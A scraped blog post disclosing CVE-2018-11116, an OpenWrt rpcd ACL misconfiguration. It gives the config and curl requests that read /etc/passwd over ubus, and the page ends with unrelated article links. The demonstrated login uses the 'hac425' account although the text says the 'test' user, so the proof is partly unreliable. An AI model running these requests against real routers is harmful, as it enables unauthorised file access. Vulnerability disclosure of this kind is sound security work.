User can access to ubus over HTTP. This way depend on rpcd service. When misconfigure the rpcd's ACL , It could lead the ACL don't work.

Steps to produce the problem

First you should get an machine running openwrt And install uhttpd and luci to provide http service

  1. opkg update
  2. opkg install luci

Then to install some tools to add users in openwrt。

  1. opkg install shadow-common
  2. opkg install shadow-useradd
  3. opkg install rpcd-mod-file

And then I add 2 user and make them can login in rpcd by modiy the rpcd config file.

  1. root@OpenWrt:~# cat /etc/config/rpcd
  2. config login
  3. option username 'hac425'
  4. option password '$p$hac425'
  5. list read '*'
  6. list write '*'
  7. config login
  8.        option username 'test'
  9.        option password '$p$test'
  10.        list read '*'
  11.        list write '*'

Next I create an config file for provide ACL to user who's username is hac425 (the config file come from wiki for openwrt

  1. root@OpenWrt:/usr/share/rpcd/acl.d# cat hac425.json
  2. {
  3.        "hac425": {
  4.                "description": "acl for hac425",
  5.                "read": {
  6.                        "ubus": {
  7.                                "file": [ "*" ],
  8.                                "log": [ "*" ],
  9.                                "service": [ "*" ],
  10.                       },
  11.               },
  12.                "write": {
  13.                        "ubus": {
  14.                                "file": [ "*" ],
  15.                                "log": [ "*" ],
  16.                                "service": [ "*" ],
  17.                       },
  18.               }
  19.       }
  20. }
  21. root@OpenWrt:/usr/share/rpcd/acl.d#

This let hac425 can call all methods in  file namespace ( "file": [ "*" ] )

I didn't create the acl file for user who's name is test, It mean that test user can only call the methods defined in unauthenticated.json.

However , when I test it , I found that the user test can also call the methods which is only allowed to hac425 user.

For example, The test user can call read method in  file namespace which is not permited to him.

Next I would show it to you.

First I use test user's username and password to login , and get the ubus_rpc_session (this value should  be used to call other method defined in Acl config files)

  1. 06:28 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "session", "login", { "username": "hac425", "password": "123" } ] }'  http://192.168.31.111/ubus
  2. {"jsonrpc":"2.0","id":1,"result":[0,{"ubus_rpc_session":"ba431d9f9791b7021389a03906c70fbf","timeout":300,"expires":300,"acls":{"access-group":{"hac425":["read","write"],"uci-access":["read","write"],"unauthenticated":["read"]},"ubus":{"file":["*"],"log":["*"],"service":["*"],"session":["access","login"]},"uci":{"*":["read","write"]}},"data":{"username":"hac425"}}]}

Then use the ubus_rpc_session  to call read method in file namespace to read the content of /etc/passwd

  1. 06:30 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "ba431d9f9791b7021389a03906c70fbf", "file", "read", { "path": "/etc/passwd" } ] }'  http://192.168.31.111/ubus
  2. {"jsonrpc":"2.0","id":1,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nhac425:x:1000:1000::\/home\/hac425:\ntest:x:1001:1001::\/home\/test:\n"}]}

Then we could get the file content.

This means that I can use test user to call read method  which is not permited to test user.

Bypass the acl.

Conclusion

The vulneratility  may lead the rpcd acl don't work successful.

This lead the evil user can call the method which is only permited call by otherone user.

【CVE-2018-11116】openwrt rpcd 配置文件错误导致访问控制失效的更多相关文章

  1. 配置文件错误导致jenkins无法启动 org.xmlpull.v1.XmlPullParserException: only 1.0 is supported as <?xml version not '1.1' (position: START_DOCUMENT seen <?xml version=\'1.1\'... @1:19)

    org.xmlpull.v1.XmlPullParserException: only 1.0 is supported as <?xml version not '1.1' (position ...

  2. 报错——selinux配置文件修改错误导致无法启动虚拟机

    selinux配置文件修改错误导致无法启动虚拟机 问题 错误修改配置文件 [root@centos73 ~]# cat /etc/selinux/config # This file controls ...

  3. Linux安装Tomcat-Nginx-FastDFS-Redis-Solr-集群——【第九集-补充-热部署项目到tomcat中,但是数据库配置文件错误,中途停止部署,导致执行shutdow.sh报错异常: Could not contact localhost:8005. Tomcat may not be running error while shutting down】

    1,经过千辛万苦的尝试和百度,终于一个博客:http://stackmirror.caup.cn/page/skxugjqj0ldc关于catalina.sh文件的执行引起了我的注意: 2,我执行ca ...

  4. Linux在fstab中因配置错误导致服务器主机无法重启的问题应该如何解决

    fstab中配置错误导致系统无法启动的恢复方案 1制造错误的案例发生,在/etc/fstab中配置如下内容 结尾的倒数第一个为1表示进行磁盘检查,为0表示不进行磁盘检查,倒数第二个为0表示不备份,为1 ...

  5. 两个由于php.ini配置错误导致的报错:ajax图片上传报错和exec报错

    遇到了两个由于php.ini配置错误导致的报错:ajax图片上传报错和exec报错 首先第一个: 在做一个用ajax图片上传的功能中,php报了这样一个错误:File upload error - u ...

  6. 给虚拟机添加新硬盘并分区,fdisk查看分区,分区,重新读取分区表信息partprobe,格式化,挂载,查看分区挂载信息,自动挂载文件/etc/fstab,/etc/fstab文件错误导致重启崩溃后的修复

    1.虚拟机关机断电 2.添加硬盘 2.开机 3.fdisk -l查看刚才新添加的硬盘 [root@localhost ~]# fdisk -l 磁盘 /dev/sda:21.5 GB, 2147483 ...

  7. [svc]mount命令及解决因/etc/fstab错误导致系统不能启动故障

    mount命令-手动挂载设备 格式: mount [options] [-t fstype] [-o option] 设备 挂载点 mount -n -o remount,rw / - Mount t ...

  8. ORA-04031错误导致宕机案例分析

    今天遇到一起ORACLE数据库宕机案例,下面是对这起数据库宕机案例的原因进行分析.解读.分析过程中顺便记录一下这个案例的前因后果,攒点经验值,培养一下分析.解决问题的能力. 案例环境:   操作系统 ...

  9. ruby -- 问题解决(四)编码错误导致无法显示(2)

    从数据库中取得数据显示时报 incompatible character encodings: GBK and ASCII-8BIT或 incompatible character encodings ...

随机推荐

  1. POJ 2245

    //此题一看便是简单的回溯题用DFS+回溯便可以做出来了. #include <iostream> #define MAXN 20 using namespace std; int _m[ ...

  2. WPF快速实现XML可视化编辑工具

    虽然最近业余时间主要都放在研究AngularJS上了,不过由于正好要帮朋友做一个生成XML的小工具,顺便又温顾了一下WPF.虽然这个时代相对于Web应用和移动App,Windows应用程序是越来越少了 ...

  3. Android UiAutomator UiDevice API

    UiDevice为单例模式 1.获取设备 static UiDevice getInstance() This method is deprecated. Should use getInstance ...

  4. Docker学习--docker的基本认识

    1.Docker 架构 Docker 使用客户端-服务器 (C/S) 架构模式,使用远程API来管理和创建Docker容器. Docker 容器通过 Docker 镜像来创建. 容器与镜像的关系类似于 ...

  5. (转)更换镜像rootvg卷组中的硬盘

    F85系统镜像盘更换实录之一:删除原有镜像操作 # cfgmgr # lsdev -Cc disk hdisk0 Available 11-09-00-8,0  16 Bit LVD SCSI Dis ...

  6. Linux下安装jdk8步骤详述(转载)

    Linux下安装jdk8步骤详述 原文地址:http://www.cnblogs.com/shihaiming/p/5809553.html 作为Java开发人员,在Linux下安装一些开发工具是必备 ...

  7. 【数组】Majority Element II

    题目: Given an integer array of size n, find all elements that appear more than ⌊ n/3 ⌋ times. The alg ...

  8. Postman—前置请求脚本

    前言 在前面的文章中已经说到了,在Postman中可以编写以下两种脚本: 前置请求脚本 测试脚本 这两种脚本的运行时机都不一样,在上一篇<Postman—脚本介绍>中已经详细的进行了介绍. ...

  9. Postman—脚本介绍

    前言 Postman包含一个基于Node.js的强大的运行时环境,它允许我们为请求和集合添加动态行为.这使的我们可以编写测试用例,构建可包含动态参数的请求,在请求之间传递数据等等. 我们可以在流程中以 ...

  10. css 中 stick footer 布局实现

    做项目中,我们在写弹框的时候,不管弹框的内容多或者少,可能需要一些内容需要固定在框底部,比如关闭按钮.stick footer 就是让 footer 元素固定在底部 当内容不足满屏时,footer 紧 ...